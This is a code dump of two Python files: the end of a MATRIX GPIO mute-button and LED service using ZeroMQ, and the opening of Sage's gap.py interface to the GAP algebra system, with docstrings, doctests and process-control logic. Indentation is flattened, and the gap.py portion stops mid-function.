if mixer.toggleMike():
ledService.send_pyobj(Data("mute", mixer._outMuted, mixer._inMuted, loop=True, force=True))
elif mixer._outMuted and not mixer._inMuted:
ledService.send_pyobj(Data("mute", mixer._outMuted, mixer._inMuted, loop=True, force=True))
else:
#If nothing is muted reset the leds once.
ledService.send_pyobj(Data(force=True))
ledService.recv()
toggleMic = False
elif reset == False:
ledService.send_pyobj(Data())
ledService.recv()
reset = True
elif toggleOut == False and gpioValues[audioToggleMute] == '1':
toggleOut = True
elif toggleMic == False and gpioValues[mikeToggleMute] == '1':
toggleMic = True
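# gpio_callback above decodes the 16 GPIO lines by formatting data.values as a
# 16-bit binary string and reversing it so that index i corresponds to pin i
# (a pressed button reads as '0'). The standalone helper below only illustrates
# that decoding; decode_gpio_bits is a hypothetical name, not part of this service.
def decode_gpio_bits(values, num_pins=16):
    """Return a list of '0'/'1' characters, one per pin, pin 0 first."""
    bits = '{0:0{1}b}'.format(values, num_pins)[::-1]
    return list(bits)

# Example: value 0b0101 means pins 0 and 2 read high, pins 1 and 3 read low.
assert decode_gpio_bits(0b0101)[:4] == ['1', '0', '1', '0']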
if __name__ == "__main__":
ioloop.install()
#Keep the connection alive
Process(target=driver_keep_alive, args=(matrix_ip, gpio_port, 1)).start()
#Configure the gpio read interval
config_gpio_read()
#Connect to the Matrix GPIO server
context = zmq.Context()
socket = context.socket(zmq.SUB)
data_port = gpio_port + 3
socket.connect('tcp://{0}:{1}'.format(matrix_ip, data_port))
socket.setsockopt(zmq.SUBSCRIBE, b'')
stream = zmqstream.ZMQStream(socket)
#Wait for a stream of data to come
stream.on_recv(gpio_callback)
#Loop
ioloop.IOLoop.instance().start()
|
gap.py
|
# -*- coding: utf-8 -*-
r"""
Interface to GAP
Sage provides an interface to the GAP system. This system provides
extensive group theory, combinatorics, etc.
The GAP interface will only work if GAP is installed on your
computer; this should be the case, since GAP is included with Sage.
The interface offers three pieces of functionality:
#. ``gap_console()`` - A function that dumps you into
an interactive command-line GAP session.
#. ``gap(expr)`` - Evaluation of arbitrary GAP
expressions, with the result returned as a string.
#. ``gap.new(expr)`` - Creation of a Sage object that
wraps a GAP object. This provides a Pythonic interface to GAP. For
example, if ``f=gap.new(10)``, then
``f.Factors()`` returns the prime factorization of
`10` computed using GAP.
First Examples
--------------
We factor an integer using GAP::
sage: n = gap(20062006); n
20062006
sage: n.parent()
Gap
sage: fac = n.Factors(); fac
[ 2, 17, 59, 73, 137 ]
sage: fac.parent()
Gap
sage: fac[1]
2
GAP and Singular
----------------
This example illustrates conversion between Singular and GAP via
Sage as an intermediate step. First we create and factor a Singular
polynomial.
::
sage: singular(389)
389
sage: R1 = singular.ring(0, '(x,y)', 'dp')
sage: f = singular('9*x^16-18*x^13*y^2-9*x^12*y^3+9*x^10*y^4-18*x^11*y^2+36*x^8*y^4+18*x^7*y^5-18*x^5*y^6+9*x^6*y^4-18*x^3*y^6-9*x^2*y^7+9*y^8')
sage: F = f.factorize()
sage: print(F)
[1]:
_[1]=9
_[2]=x^6-2*x^3*y^2-x^2*y^3+y^4
_[3]=-x^5+y^2
[2]:
1,1,2
Next we convert the factor `-x^5+y^2` to a Sage
multivariate polynomial. Note that it is important to let
`x` and `y` be the generators of a polynomial ring,
so the eval command works.
::
sage: R.<x,y> = PolynomialRing(QQ,2)
sage: s = F[1][3].sage_polystring(); s
'-x**5+y**2'
sage: g = eval(s); g
-x^5 + y^2
Next we create a polynomial ring in GAP and obtain its
indeterminates::
sage: R = gap.PolynomialRing('Rationals', 2); R
PolynomialRing( Rationals, ["x_1", "x_2"] )
sage: I = R.IndeterminatesOfPolynomialRing(); I
[ x_1, x_2 ]
In order to eval `g` in GAP, we need to tell GAP to view
the variables ``x0`` and ``x1`` as the two
generators of `R`. This is the one tricky part. In the GAP
interpreter the object ``I`` has its own name (which
isn't ``I``). We can access its name using
``I.name()``.
::
sage: _ = gap.eval("x := %s[1];; y := %s[2];;"%(I.name(), I.name()))
Now `x_0` and `x_1` are defined, so we can
construct the GAP polynomial `f` corresponding to
`g`::
sage: R.<x,y> = PolynomialRing(QQ,2)
sage: f = gap(str(g)); f
-x_1^5+x_2^2
We can call GAP functions on `f`. For example, we evaluate
the GAP ``Value`` function, which evaluates `f`
at the point `(1,2)`.
::
sage: f.Value(I, [1,2])
3
sage: g(1,2) # agrees
3
Saving and loading objects
--------------------------
Saving and loading GAP objects (using the dumps method, etc.) is
*not* supported, since the output string representation of Gap
objects is sometimes not valid input to GAP. Creating classes that
wrap GAP objects *is* supported, by simply defining a
``_gap_init_`` member function that returns a string which, when
evaluated in GAP, constructs the object. See
``groups/perm_gps/permgroup.py`` for a nontrivial
example of this.
Long Input
----------
The GAP interface reads in even very long input (using files) in a
robust manner, as long as you are creating a new object.
.. note::
Using ``gap.eval`` for long input is much less robust, and is not
recommended.
::
sage: t = '"%s"'%10^10000 # ten thousand character string.
sage: a = gap(t)
Changing which GAP is used
--------------------------
Use this code to change which GAP interpreter is run. E.g.,
::
import sage.interfaces.gap
sage.interfaces.gap.gap_cmd = "/usr/local/bin/gap"
AUTHORS:
- David Joyner and William Stein: initial version(s)
- William Stein (2006-02-01): modified gap_console command so it uses
exactly the same startup command as Gap.__init__.
- William Stein (2006-03-02): added tab completions: gap.[tab], x =
gap(...), x.[tab], and docs, e.g., gap.function? and x.function?
"""
#*****************************************************************************
# Copyright (C) 2005 William Stein <[email protected]>
#
# Distributed under the terms of the GNU General Public License (GPL)
#
# This code is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# The full text of the GPL is available at:
#
# http://www.gnu.org/licenses/
#*****************************************************************************
from .expect import Expect, ExpectElement, FunctionElement, ExpectFunction
from .gap_workspace import gap_workspace_file, prepare_workspace_dir
from sage.cpython.string import bytes_to_str
from sage.env import SAGE_EXTCODE
from sage.misc.misc import is_in_string
from sage.misc.cachefunc import cached_method
from sage.docs.instancedoc import instancedoc
from sage.interfaces.tab_completion import ExtraTabCompletion
from sage.structure.element import ModuleElement
import re
import os
import io
import pexpect
import time
import platform
import string
import warnings
WORKSPACE = gap_workspace_file()
first_try = True
gap_cmd = "gap -r"
if platform.processor() == 'ia64' and os.path.exists('/usr/bin/prctl'):
# suppress unaligned access to 0x..., ip=0x... warnings
gap_cmd = 'prctl --unaligned=silent ' + gap_cmd
def gap_command(use_workspace_cache=True, local=True):
if use_workspace_cache:
if local:
return "%s -L %s"%(gap_cmd, WORKSPACE), False
else:
# TO DO: Use remote workspace
return gap_cmd, False
else:
return gap_cmd, True
############ Set the GAP memory pool size
# you should always use get_gap_memory_pool_size() to access this value
gap_memory_pool_size = None
def set_gap_memory_pool_size(size_in_bytes):
"""
Set the desired gap memory pool size.
Subsequently started GAP instances will use this as default.
Already running instances are unchanged.
GAP will only reserve ``size_in_bytes`` address space. Unless you
actually start a big GAP computation, the memory will not be
used. However, corresponding swap space will be reserved so that
GAP will always be able to use the reserved address space if
needed. While nothing is actually written to disc as long as you
don't run a big GAP computation, the reserved swap space will not
be available for other processes.
INPUT:
- ``size_in_bytes`` -- integer. The desired memory pool size.
EXAMPLES::
sage: from sage.interfaces.gap import \
....: get_gap_memory_pool_size, set_gap_memory_pool_size
sage: n = get_gap_memory_pool_size()
sage: set_gap_memory_pool_size(n)
sage: n == get_gap_memory_pool_size()
True
sage: n # random output
1534059315
"""
global gap_memory_pool_size
gap_memory_pool_size = size_in_bytes
def get_gap_memory_pool_size():
"""
Get the gap memory pool size for new GAP processes.
EXAMPLES::
sage: from sage.interfaces.gap import get_gap_memory_pool_size
sage: get_gap_memory_pool_size() # random output
1534059315
"""
global gap_memory_pool_size
if gap_memory_pool_size is not None:
return gap_memory_pool_size
import psutil
from sage.misc.getusage import virtual_memory_limit
mem = psutil.virtual_memory()
swap = psutil.swap_memory()
vmax = virtual_memory_limit()
suggested_size = max(swap.free // 10, mem.available // 50)
# Don't eat all address space if the user set ulimit -v
suggested_size = min(suggested_size, vmax // 10)
# Enforce a lower bound: long doctests need at least ~220MB, so reserve 400MB
suggested_size = max(suggested_size, 400 * 1024**2)
return suggested_size
def _get_gap_memory_pool_size_MB():
"""
Return the gap memory pool size suitable for usage on the GAP
command line.
The GAP 4.5.6 command line parser had issues with large numbers, so
we return it in megabytes.
OUTPUT:
String.
EXAMPLES::
sage: from sage.interfaces.gap import \
....: _get_gap_memory_pool_size_MB
sage: _get_gap_memory_pool_size_MB() # random output
'1467m'
"""
pool = get_gap_memory_pool_size()
pool = (pool // (1024**2)) + 1
return str(pool)+'m'
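# Worked example of the pool-size heuristic above, with made-up numbers (8 GB of
# free swap, 16 GB of available RAM, a 64 GB virtual-memory limit); this is an
# illustration only, the _example_pool name is not used anywhere else:
_GB = 1024**3
_example_pool = max(8 * _GB // 10, 16 * _GB // 50)   # max(swap.free // 10, mem.available // 50)
_example_pool = min(_example_pool, 64 * _GB // 10)   # cap at a tenth of the vmax limit
_example_pool = max(_example_pool, 400 * 1024**2)    # enforce the 400MB floor
# _example_pool is ~0.8 GB; formatted as above for the command line this gives '820m'.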
############ Classes with methods for both the GAP3 and GAP4 interface
class Gap_generic(ExtraTabCompletion, Expect):
r"""
Generic interface to the GAP3/GAP4 interpreters.
AUTHORS:
- William Stein and David Joyner (interface for GAP4)
- Franco Saliola (Feb 2010): refactored to separate out the generic
code
"""
_identical_function = "IsIdenticalObj"
def _synchronize(self, timeout=0.5, cmd='%s;'):
"""
Synchronize GAP pexpect interface.
See the base method
:meth:`~sage.interfaces.expect.Expect._synchronize` for more
details.
We override this method since we are looking at GAP package
mode output, which is quite different from the normal
(human-readable) interface.
EXAMPLES::
sage: gap('"ok"')
ok
sage: gap._expect.sendline() # now we are out of sync
1
sage: gap._synchronize()
sage: gap(123)
123
"""
if self._expect is None:
return
E = self._expect
from sage.misc.prandom import randrange
rnd = randrange(2147483647)
cmd = str(rnd)+';'
try:
E.sendline(cmd)
E.expect(r'@[nf][@J\s>]*'+str(rnd), timeout=timeout)
E.send(' ')
E.expect('@i', timeout=timeout)
except pexpect.TIMEOUT:
self.interrupt()
except pexpect.EOF:
self._crash_msg()
self.quit()
def interrupt(self, tries=None, timeout=1, quit_on_fail=True):
"""
Interrupt the GAP process
Gap installs a SIGINT handler; we call it directly instead of
trying to send Ctrl-C. Unlike
:meth:`~sage.interfaces.expect.Expect.interrupt`, we only try
once, since we know what we are doing.
Sometimes GAP dies while interrupting.
EXAMPLES::
sage: gap._eval_line('while(1=1) do i:=1;; od;', wait_for_prompt=False)
''
sage: rc = gap.interrupt(timeout=1)
sage: [ gap(i) for i in range(10) ] # check that it is still working
[0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
TESTS::
sage: gap('"finished computation"'); gap.interrupt(); gap('"ok"')
finished computation
True
ok
"""
E = self._expect
if E is None:
return True
# GAP oddity: If a computation is running and we send Ctrl-C,
# it is stopped as expected. But if we are at the idle prompt,
# nothing is happening UNTIL we run the next command (which is
# then immediately interrupted).
# There is apparently also a race in GAP between the signal
# handler and input, if we don't wait a bit the result is
# unpredictable.
E.sendline(chr(3))
time.sleep(0.1)
E.sendline()
try:
# send a dummy command
E.sendline('224433409;')
# read everything up to the actual output of the command
E.expect(r'@[nf][@J\s>]*224433409', timeout=timeout)
E.send(' ')
# the following input prompt should be the current input
# prompt but GAP might be too confused to display it
# E.expect('@i', timeout=timeout)
# Ideally, we would be finished here. But sometimes GAP
# thinks it is still inside a do/od block. So we run some
# more plain commands to get back into sync. These might
# either complete successfully (output "@n+<number>") or
# return a "Syntax error: od expected@J@f +<number>"
E.sendline()
time.sleep(0.1)
E.sendline('224433437;')
E.expect(r'@[nf][@J\s>]*224433437', timeout=timeout)
E.sendline()
time.sleep(0.1)
E.sendline('224433479;')
E.expect(r'@[nf][@J\s>]*224433479', timeout=timeout)
E.send(' ')
# the following input prompt is now the current input prompt
E.expect('@i', timeout=timeout)
success = True
except (pexpect.TIMEOUT, pexpect.EOF):
# GAP died or hangs indefinitely
success = False
if not success and quit_on_fail:
self.quit()
return success
def _assign_symbol(self):
r"""
Return the assign symbol in GAP.
TESTS::
sage: gap = Gap()
sage: print(gap._assign_symbol())
:=
"""
return ":="
def _quit_string(self):
"""
Returns the string used to quit GAP.
EXAMPLES::
sage: gap._quit_string()
'quit;'
::
sage: g = Gap()
sage: a = g(2); g.is_running()
True
sage: g.quit()
sage: g.is_running()
False
"""
return 'quit;'
def _read_in_file_command(self, filename):
r"""
Returns the command use to read in a file in GAP.
EXAMPLES::
sage: gap._read_in_file_command('test')
'Read("test");'
::
sage: filename = tmp_filename()
sage: with open(filename, 'w') as f:
....: _ = f.write('xx := 22;\n')
sage: gap.read(filename)
sage: gap.get('xx').strip()
'22'
"""
return 'Read("%s");' % filename
def _continuation_prompt(self):
"""
Returns the continuation prompt in GAP.
EXAMPLES::
sage: gap._continuation_prompt()
'> '
"""
return '> '
def load_package(self, pkg, verbose=False):
"""
Load the Gap package with the given name.
If loading fails, raise a RuntimeError exception.
TESTS::
sage: gap.load_package("chevie")
Traceback (most recent call last):
...
RuntimeError: Error loading Gap package chevie. You may want to install gap_packages SPKG.
"""
if verbose:
print("Loading GAP package {}".format(pkg))
x = self.eval('LoadPackage("{}")'.format(pkg))
if x == 'fail':
raise RuntimeError("Error loading Gap package "+str(pkg)+". "+
"You may want to install gap_packages SPKG.")
def eval(self, x, newlines=False, strip=True, split_lines=True, **kwds):
r"""
Send the code in the string ``x`` to the GAP interpreter and return the
output as a string.
INPUT:
- ``x`` - string containing GAP code.
- ``newlines`` - bool (default: False); if False,
remove all backslash-newlines inserted by the GAP output
formatter.
- ``strip`` - ignored
- ``split_lines`` -- bool (default: True); if True then each
line is evaluated separately. If False, then the whole
block of code is evaluated all at once.
EXAMPLES::
sage: gap.eval('2+2')
'4'
sage: gap.eval('Print(4); #test\n Print(6);')
'46'
sage: gap.eval('Print("#"); Print(6);')
'#6'
sage: gap.eval('4; \n 6;')
'4\n6'
sage: gap.eval('if 3>2 then\nPrint("hi");\nfi;')
'hi'
sage: gap.eval('## this is a test\nPrint("OK")')
'OK'
sage: gap.eval('Print("This is a test. Oh no, a #");# but this is a comment\nPrint("OK")')
'This is a test. Oh no, a #OK'
sage: gap.eval('if 4>3 then')
''
sage: gap.eval('Print("Hi how are you?")')
'Hi how are you?'
sage: gap.eval('fi')
''
TESTS:
Whitespace is not stripped from the front of the result
(:trac:`28439`)::
sage: gap.eval(r'Print(" -\n\\\\- ")')
' -\n\\\\-'
"""
# '"
#We remove all of the comments: On each line, we try
#to find a pound sign. If we find it, we check to see if
#it is occurring in a string. If it is not in a string, we
#strip off the comment.
if not split_lines:
input_line=str(x)
else:
input_line = ""
for line in str(x).rstrip().split('\n'):
pound_position = line.find('#')
while pound_position != -1:
if not is_in_string(line, pound_position):
line = line[:pound_position]
pound_position = line.find('#',pound_position+1)
input_line += " "+line
if not input_line.endswith(';'):
input_line += ';'
result = Expect.eval(self, input_line, **kwds)
if not newlines:
result = result.replace("\\\n","")
return result.rstrip()
def _execute_line(self, line, wait_for_prompt=True, expect_eof=False):
if self._expect is None: # interface is down
self._start()
E = self._expect
try:
if len(line) > 4095:
raise RuntimeError("Passing commands this long to gap would hang")
E.sendline(line)
except OSError:
raise RuntimeError("Error evaluating %s in %s"%(line, self))
if not wait_for_prompt:
return (b'',b'')
if len(line)==0:
return (b'',b'')
try:
terminal_echo = [] # to be discarded
normal_outputs = [] # GAP stdout
error_outputs = [] # GAP stderr
current_outputs = terminal_echo
while True:
x = E.expect_list(self._compiled_full_pattern)
current_outputs.append(E.before)
if x == 0: # @p
if E.after != b'@p1.':
warnings.warn(
"possibly wrong version of GAP package "
"interface. Crossing fingers and continuing.")
elif x == 1: #@@
current_outputs.append(b'@')
elif x == 2: #special char
c = ord(E.after[1:2]) - ord(b'A') + 1
s = bytes([c])
current_outputs.append(s)
elif x == 3: # garbage collection info, ignore
pass
elif x == 4: # @e -- break loop
E.sendline("quit;")
elif x == 5: # @c completion, doesn't seem to happen when -p is in use
warnings.warn("I didn't think GAP could do this")
elif x == 6: # @f GAP error message
current_outputs = error_outputs
elif x == 7: # @h help text, but this stopped happening with new help
warnings.warn("I didn't think GAP could do this")
elif x == 8: # @i awaiting normal input
break
elif x == 9: # @m finished running a child
pass # there is no need to do anything
elif x==10: #@n normal output line
current_outputs = normal_outputs
elif x==11: #@r echoing input
current_outputs = terminal_echo
elif x==12: #@sN shouldn't happen
warnings.warn("this should never happen")
elif x==13: #@w GAP is trying to send a Window command
warnings.warn("this should never happen")
elif x ==14: #@x seems to be safely ignorable
pass
elif x == 15:#@z GAP starting a subprocess
pass # there is no need to do anything
except pexpect.EOF:
if not expect_eof:
raise RuntimeError("Unexpected EOF from %s executing %s"%(self,line))
except IOError:
raise RuntimeError("IO Error from %s executing %s"%(self,line))
return (b"".join(normal_outputs), b"".join(error_outputs))
def _keyboard_interrupt(self):
"""
TESTS:
We check that the gap interface behaves correctly after an
interrupt::
sage: gap(2)
2
sage: try:
....: alarm(0.5)
....: gap.eval('while(1=1) do i:=1;; od;', wait_for_prompt=True)
....: except KeyboardInterrupt:
....: pass
sage: gap(2)
2
"""
self.quit()
raise KeyboardInterrupt("Ctrl-c pressed while running %s"%self)
def _eval_line(self, line, allow_use_file=True, wait_for_prompt=True, restart_if_needed=True):
r"""
Evaluate a line of commands.
REMARK:
By default, a long command (length exceeding ``self._eval_using_file_cutoff``)
is evaluated using :meth:`_eval_line_using_file`.
If the command can not be evaluated since the interface
has crashed, it is automatically restarted and tried
again *once*.
If the optional ``wait_for_prompt`` is ``False`` then even a very long line
will not be evaluated by :meth:`_eval_line_using_file`, since this does not
support the ``wait_for_prompt`` option.
INPUT:
- ``line`` -- (string) a command.
- ``allow_use_file`` (optional bool, default ``True``) --
allow to evaluate long commands using :meth:`_eval_line_using_file`.
- ``wait_for_prompt`` (optional bool, default ``True``) --
wait until the prompt appears in the sub-process' output.
- ``restart_if_needed`` (optional bool, default ``True``) --
If it is ``True``, the command evaluation is evaluated
a second time after restarting the interface, if an
``EOFError`` occurred.
TESTS::
sage: gap._eval_line('2+2;')
'4'
We test the ``wait_for_prompt`` option by sending a command that
creates an infinite loop in the GAP sub-process. But if we don't
wait for the prompt to appear in the output, we can interrupt
the loop without raising a KeyboardInterrupt. At the same time,
we test that the line is not forwarded to :meth:`_eval_line_using_file`,
since that method would not support the ``wait_for_prompt`` option::
sage: cutoff = gap._eval_using_file_cutoff
sage: gap._eval_using_file_cutoff = 4
sage: gap._eval_line('while(1=1) do i:=1;; od;', wait_for_prompt=False)
''
sage: rc = gap.interrupt(timeout=1)
sage: gap._eval_using_file_cutoff = cutoff
The following tests against a bug fixed at :trac:`10296`::
sage: gap(3)
3
sage: gap.eval('quit;')
''
sage: a = gap(3)
** Gap crashed or quit executing '\$sage...:=3;;' **
Restarting Gap and trying again
sage: a
3
"""
expect_eof = self._quit_string() in line
try:
if self._expect is None:
self._start()
if allow_use_file and wait_for_prompt and len(line) > self._eval_using_file_cutoff:
return self._eval_line_using_file(line)
(normal, error) = self._execute_line(line, wait_for_prompt=wait_for_prompt,
expect_eof=expect_eof)
# The internal method _execute_line returns bytes but the bytes it
# returns should contain text (any terminal commands and other
# garbage should be filtered out by this point); here we decode
# them (on Python 3), currently just using the default encoding
normal, error = bytes_to_str(normal), bytes_to_str(error)
if len(error):
if 'Error, Rebuild completion files!' in error:
error += "\nRunning gap_reset_workspace()..."
self.quit()
gap_reset_workspace()
error = error.replace('\r','')
raise RuntimeError("%s produced error output\n%s\n executing %s"%(self, error,line))
if not len(normal):
return ''
if isinstance(wait_for_prompt, str) and normal.ends_with(wait_for_prompt):
n = len(wait_for_prompt)
elif normal.endswith(bytes_to_str(self._prompt)):
n = len(self._prompt)
elif normal.endswith(self._continuation_prompt()):
n = len(self._continuation_prompt())
else:
n = 0
out = normal[:-n]
if len(out) and out[-1] == "\n":
out = out[:-1]
return out
except (RuntimeError, TypeError, pexpect.ExceptionPexpect) as exc:
if not self._isalive():
# We can't distinguish just EOF from an unexpectedly killed
# process because pexpect catches EOFs and re-raises them
# But if we *were* expecting EOF then we should just let it
# fail silently and return
if expect_eof:
return ''
print("** %s crashed or quit executing '%s' **" % (self, line))
print("Restarting %s and trying again" % self)
self._start()
if line != '':
return self._eval_line(line, allow_use_file=allow_use_file)
else:
return ''
else:
raise RuntimeError(exc)
except KeyboardInterrupt:
self._keyboard_interrupt()
raise KeyboardInterrupt("Ctrl-c pressed while running %s"%self)
def unbind(self, var):
"""
Clear the variable named var.
EXAMPLES::
sage: gap.set('x', '2')
sage: gap.get('x')
'2'
sage: gap.unbind('x')
sage: gap.get('x')
Traceback (most recent call last):
...
RuntimeError: Gap produced error output
Error, Variable: 'x' must have a value
...
"""
self.eval('Unbind(%s)'%var)
self.clear(var)
def _contains(self, v1, v2):
"""
EXAMPLES::
sage: Integers = gap('Integers')
sage: two = gap(2)
sage: gap._contains(two.name(), Integers.name())
True
::
sage: 2 in gap('Integers')
True
"""
return self.eval('%s in %s'%(v1,v2)) == "true"
def _true_symbol(self):
"""
Returns the symbol for truth in GAP.
EXAMPLES::
sage: gap._true_symbol()
'true'
sage: gap(2) == gap(2)
True
"""
return "true"
def _false_symbol(self):
"""
Returns the symbol for falsity in GAP.
EXAMPLES::
sage: gap._false_symbol()
'false'
sage: gap(2) == gap(3)
False
"""
return "false"
def _equality_symbol(self):
"""
Returns the symbol for equality in GAP.
EXAMPLES::
sage: gap._equality_symbol()
'='
sage: gap(2) == gap(3)
False
sage: gap(2) == gap(2)
True
"""
return "="
def version(self):
"""
Returns the version of GAP being used.
EXAMPLES::
sage: print(gap.version())
4...
"""
return self.eval('GAPInfo.Version')[1:-1]
def function_call(self, function, args=None, kwds=None):
"""
Calls the GAP function with args and kwds.
EXAMPLES::
sage: gap.function_call('SymmetricGroup', [5])
SymmetricGroup( [ 1 .. 5 ] )
If the GAP function does not return a value, but prints something
to the screen, then a string of the printed output is returned.
::
sage: s = gap.function_call('Display', [gap.SymmetricGroup(5).CharacterTable()])
sage: type(s)
<class 'sage.interfaces.interface.AsciiArtString'>
sage: s.startswith('CT')
True
TESTS:
If the function call is too long, two ``gap.eval`` calls are made
since returned values from commands in a file cannot be handled
properly::
sage: g = Gap()
sage: g.function_call("ConjugacyClassesSubgroups", sage.interfaces.gap.GapElement(g, 'SymmetricGroup(2)', name = 'a_variable_with_a_very_very_very_long_name')) # random
[ ConjugacyClassSubgroups(SymmetricGroup( [ 1 .. 2 ] ),Group( () )),
ConjugacyClassSubgroups(SymmetricGroup( [ 1 .. 2 ] ),Group( [ (1,2) ] )) ]
When the command itself is so long that it warrants use of a temporary
file to be communicated to GAP, this does not cause problems since
the file will contain a single command::
sage: g.function_call("ConjugacyClassesSubgroups", sage.interfaces.gap.GapElement(g, 'SymmetricGroup(2)', name = 'a_variable_with_a_name_so_very_very_very_long_that_even_by_itself_will_make_expect_use_a_file')) # random
[ ConjugacyClassSubgroups(SymmetricGroup( [ 1 .. 2 ] ),Group( () )),
ConjugacyClassSubgroups(SymmetricGroup( [ 1 .. 2 ] ),Group( [ (1,2) ] )) ]
"""
args, kwds = self._convert_args_kwds(args, kwds)
self._check_valid_function_name(function)
#Here we have to do some magic because not all GAP
#functions return a value. If you try to store their
#results to a variable, then GAP will complain. Thus, before
#we evaluate the function, we make it so that the marker string
#is in the 'last' variable in GAP. If the function returns a
#value, then that value will be in 'last', otherwise it will
#be the marker.
marker = '__SAGE_LAST__:="__SAGE_LAST__";;'
cmd = "%s(%s);;"%(function, ",".join([s.name() for s in args]+
['%s=%s'%(key,value.name()) for key, value in kwds.items()]))
if len(marker) + len(cmd) <= self._eval_using_file_cutoff:
# We combine the two commands so we only run eval() once and the
# only output would be from the second command
res = self.eval(marker+cmd)
else:
self.eval(marker)
res = self.eval(cmd)
if self.eval(self._identical_function + '(last,__SAGE_LAST__)') != 'true':
return self.new('last2;')
else:
if res.strip():
from sage.interfaces.interface import AsciiArtString
return AsciiArtString(res)
def get_record_element(self, record, name):
r"""
Return the element of a GAP record identified by ``name``.
INPUT:
- ``record`` -- a GAP record
- ``name`` -- str
OUTPUT:
- :class:`GapElement`
EXAMPLES::
sage: rec = gap('rec( a := 1, b := "2" )')
sage: gap.get_record_element(rec, 'a')
1
sage: gap.get_record_element(rec, 'b')
2
TESTS::
sage: rec = gap('rec( a := 1, b := "2" )')
sage: type(gap.get_record_element(rec, 'a'))
<class 'sage.interfaces.gap.GapElement'>
"""
return self('%s.%s' % (record.name(), name))
# We need to inherit from ModuleElement to support
# sage.structure.coerce_actions.ModuleAction and it needs to be first
# in the MRO because extension types should always come first.
@instancedoc
class GapElement_generic(ModuleElement, ExtraTabCompletion, ExpectElement):
r"""
Generic interface to the GAP3/GAP4 interpreters.
AUTHORS:
- William Stein and David Joyner (interface for GAP4)
- Franco Saliola (Feb 2010): refactored to separate out the generic
code
"""
def _add_(self, other):
"""
EXAMPLES::
sage: a = gap(1)
sage: a + a
2
"""
# This is just a copy of ExpectElement._add_ to fix the fact
# that the abstract method ModuleElement._add_ comes first in
# the MRO.
return self._operation("+", other)
def __bool__(self):
"""
EXAMPLES::
sage: bool(gap(2))
True
sage: gap(0).bool()
False
sage: gap('false').bool()
False
"""
P = self._check_valid()
return self != P(0) and repr(self) != 'false'
__nonzero__ = __bool__
def __len__(self):
"""
EXAMPLES::
sage: v = gap('[1,2,3]'); v
[ 1, 2, 3 ]
sage: len(v)
3
len is also called implicitly by if::
sage: if gap('1+1 = 2'):
....: print("1 plus 1 does equal 2")
1 plus 1 does equal 2
::
sage: if gap('1+1 = 3'):
....: print("it is true")
....: else:
....: print("it is false")
it is false
"""
P = self.parent()
if P.eval('%s = true'%self.name()) == 'true':
return 1
elif P.eval('%s = false'%self.name()) == 'true':
return 0
else:
return int(self.Length())
def is_string(self):
"""
Tell whether this element is a string.
EXAMPLES::
sage: gap('"abc"').is_string()
True
sage: gap('[1,2,3]').is_string()
False
"""
return bool(self.IsString())
def _matrix_(self, R):
r"""
Return matrix over the (Sage) ring R determined by self, where self
should be a Gap matrix.
EXAMPLES::
sage: s = gap("(Z(7)^0)*[[1,2,3],[4,5,6]]"); s
[ [ Z(7)^0, Z(7)^2, Z(7) ], [ Z(7)^4, Z(7)^5, Z(7)^3 ] ]
sage: s._matrix_(GF(7))
[1 2 3]
[4 5 6]
::
sage: s = gap("[[1,2], [3/4, 5/6]]"); s
[ [ 1, 2 ], [ 3/4, 5/6 ] ]
sage: m = s._matrix_(QQ); m
[ 1 2]
[3/4 5/6]
sage: parent(m)
Full MatrixSpace of 2 by 2 dense matrices over Rational Field
::
sage: s = gap('[[Z(16),Z(16)^2],[Z(16)^3,Z(16)]]')
sage: s._matrix_(GF(16,'a'))
[ a a^2]
[a^3 a]
"""
v = self.DimensionsMat()
n = int(v[1])
m = int(v[2])
from sage.matrix.matrix_space import MatrixSpace
M = MatrixSpace(R, n, m)
entries = [[R(self[r,c]) for c in range(1,m+1)] for r in range(1,n+1)]
return M(entries)
############
class Gap(Gap_generic):
r"""
Interface to the GAP interpreter.
AUTHORS:
- William Stein and David Joyner
"""
def __init__(self, max_workspace_size=None,
maxread=None, script_subdirectory=None,
use_workspace_cache=True,
server=None,
server_tmpdir=None,
logfile=None,
seed=None,
env={}):
"""
EXAMPLES::
sage: gap == loads(dumps(gap))
True
"""
self.__use_workspace_cache = use_workspace_cache
cmd, self.__make_workspace = gap_command(use_workspace_cache, server is None)
# -b: suppress banner
# -p: enable "package output mode"; this confusingly named option
# causes GAP to output special control characters that are normally
# intended for communication with a window manager (i.e. for xgap)
# but that we also use to control GAP with pexpect
# -T: disable interactive break loop when encountering errors
# -E: disable readline support
cmd += " -b -p -T -E"
if max_workspace_size is None:
max_workspace_size = _get_gap_memory_pool_size_MB()
cmd += ' -o ' + str(max_workspace_size)
cmd += ' -s ' + str(max_workspace_size)
cmd += ' -m 64m ' # attempt at a workaround for http://tracker.gap-system.org/issues/224
cmd += ' ' + os.path.join(SAGE_EXTCODE, 'gap', 'sage.g')
Expect.__init__(self,
name='gap',
prompt='gap> ',
command=cmd,
maxread=maxread,
server=server,
server_tmpdir=server_tmpdir,
script_subdirectory=script_subdirectory,
restart_on_ctrlc=True,
verbose_start=False,
logfile=logfile,
eval_using_file_cutoff=100,
env=env)
self.__seq = 0
self._seed = seed
def set_seed(self,seed=None):
"""
Set the seed for gap interpreter.
The seed should be an integer.
EXAMPLES::
sage: g = Gap()
sage: g.set_seed(0)
0
sage: [g.Random(1,10) for i in range(5)]
[2, 3, 3, 4, 2]
"""
if seed is None:
seed = self.rand_seed()
self.eval("Reset(GlobalMersenneTwister,%d);;" % seed)
self.eval("Reset(GlobalRandomSource,%d);;" % seed)
self._seed = seed
return seed
def __reduce__(self):
"""
EXAMPLES::
sage: gap.__reduce__()
(<function reduce_load_GAP at 0x...>, ())
sage: f, args = _
sage: f(*args)
Gap
"""
return reduce_load_GAP, tuple([])
def _next_var_name(self):
r"""
Returns the next unused variable name.
Note that names starting with dollar signs are valid GAP
identifiers, but need to be escaped with a backslash starting
with GAP-4.8.
EXAMPLES::
sage: g = Gap()
sage: g._next_var_name()
'\\$sage1'
sage: g(2)^2
4
sage: g._next_var_name()
'\\$sage...'
"""
if len(self._available_vars) != 0:
v = self._available_vars[0]
del self._available_vars[0]
return v
self.__seq += 1
return r'\$sage%s'%self.__seq
def _start(self):
"""
EXAMPLES::
sage: g = Gap()
sage: g.is_running()
False
sage: g._start()
sage: g.is_running()
True
sage: g.quit()
"""
if self.__use_workspace_cache:
from sage.libs.gap.saved_workspace import timestamp
try:
# Check to see if we need to auto-regenerate the gap
